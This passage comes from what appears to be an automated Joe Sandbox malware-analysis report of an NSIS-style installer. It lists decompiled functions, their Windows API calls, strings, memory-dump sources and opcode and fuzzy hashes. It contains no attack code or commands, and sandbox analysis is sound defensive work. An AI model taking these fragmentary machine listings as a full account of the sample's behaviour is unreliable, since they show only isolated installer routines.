                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                      • String ID:
                                                      • API String ID: 3294113728-0
                                                      • Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                      • Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
                                                      • Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                      • Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
                                                      Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                      • GetTickCount.KERNEL32 ref: 00402D53
                                                      • wsprintfW.USER32 ref: 00402D81
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll), ref: 0040525F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                        • Part of subcall function 00402CFE: MulDiv.KERNEL32(0002C6C2,00000064,0003161B), ref: 00402D13
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                      • String ID: ... %d%%
                                                      • API String ID: 722711167-2449383134
                                                      • Opcode ID: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                      • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                      • Opcode Fuzzy Hash: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                      • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                      Function 00404ABC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                      • GetMessagePos.USER32 ref: 00404ADF
                                                      • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                      • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                      • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                      • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                      Function 00401D41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401D44
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                      • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                      • String ID: Times New Roman
                                                      • API String ID: 3808545654-927190056
                                                      • Opcode ID: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                      • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                      • Opcode Fuzzy Hash: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                      • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                      Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                      • wsprintfW.USER32 ref: 00402CD1
                                                      • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                      • API String ID: 1451636040-1158693248
                                                      • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                      • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                      • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                      • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                      Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                      • GlobalFree.KERNEL32(?), ref: 10002572
                                                      • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.1384465097.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385695895.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385764243.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc
                                                      • String ID:
                                                      • API String ID: 1780285237-0
                                                      • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                      • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                      • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                      • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                      Function 004049D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                      • wsprintfW.USER32 ref: 00404A70
                                                      • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s$&B
                                                      • API String ID: 3540041739-2907463167
                                                      • Opcode ID: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                      • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                      • Opcode Fuzzy Hash: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                      • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                      Function 00402331 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                      • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValuelstrlen
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp
                                                      • API String ID: 1356686001-2707921621
                                                      • Opcode ID: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                      • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                      • Opcode Fuzzy Hash: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                      • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                      Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.1384465097.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385695895.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385764243.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FreeGlobal
                                                      • String ID:
                                                      • API String ID: 2979337801-0
                                                      • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                      • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                      • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                      • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                      Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.1384465097.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385695895.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385764243.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                      • String ID:
                                                      • API String ID: 1148316912-0
                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                      Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                      • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                      • DeleteObject.GDI32(00000000), ref: 00401D36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                      • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                      • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                      • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                      Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                      • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                      • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                      • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                      Function 00405993 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403344,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00405999
                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403344,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 004059A3
                                                      • lstrcatW.KERNEL32(?,00409014), ref: 004059B5
                                                      Strings
                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405993
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrcatlstrlen
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                      • API String ID: 2659869361-2382934351
                                                      • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                      • Instruction ID: a3647a5b8e032715a8ecc0c41ac115d98c53e42c85c632df021e5d83325ae185
                                                      • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                      • Instruction Fuzzy Hash: 74D0A731101930AAD212BB548C04DDF739CEE45301740407BF605B30A1C77C1D418BFD
                                                      Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                      • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                      • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
